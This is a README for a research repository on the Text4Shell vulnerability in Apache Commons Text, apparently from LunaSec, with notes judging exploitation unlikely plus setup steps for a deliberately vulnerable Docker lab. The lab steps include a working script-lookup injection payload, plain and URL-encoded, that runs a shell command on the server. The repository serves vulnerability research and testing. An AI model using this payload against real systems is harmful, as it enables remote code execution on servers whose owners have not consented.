README.md

LunaSec Notes

LunaSec research notes from us investigating Text4Shell as a part of our blost post about the vulnerability.

We've determined that it's very unlikely that Text4Shell is exploitable in 99.999% of the usages of Apache Commons Text because very few people seem to be using the createInterpolator() method.

Our research focussed on other ways that Apache Commons Text could invole the script handler, but we were unable to find any other ways to do so (even setting flags like setEnableSubstitutionInVariables to true or using recursive variable resolution).

You can see our notes in the HelloController.java file. The file in the Test folder is how we were testing this quickly. (We're using IntelliJ, so you can just run the test from there if you have that setup.)

Original Readme

Install maven - maven-linux

---

1. Maven install to create the fat jar

mvn clean install

2. Docker build

docker build --tag=text4shell .

3. Docker run

docker run -p 80:8080 text4shell

4. Test the app

http://localhost/text4shell/attack?search=<anything>

5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

6. You can also try using dns or url prefixes.

7. Get the container id

docker container ls

8. Get into the app

docker exec -it <container_id> bash

9. To check if above RCE was successful (You should see a file named foo created in the /tmp directory):

ls /tmp/

10. To stop the container

docker container stop <container_id>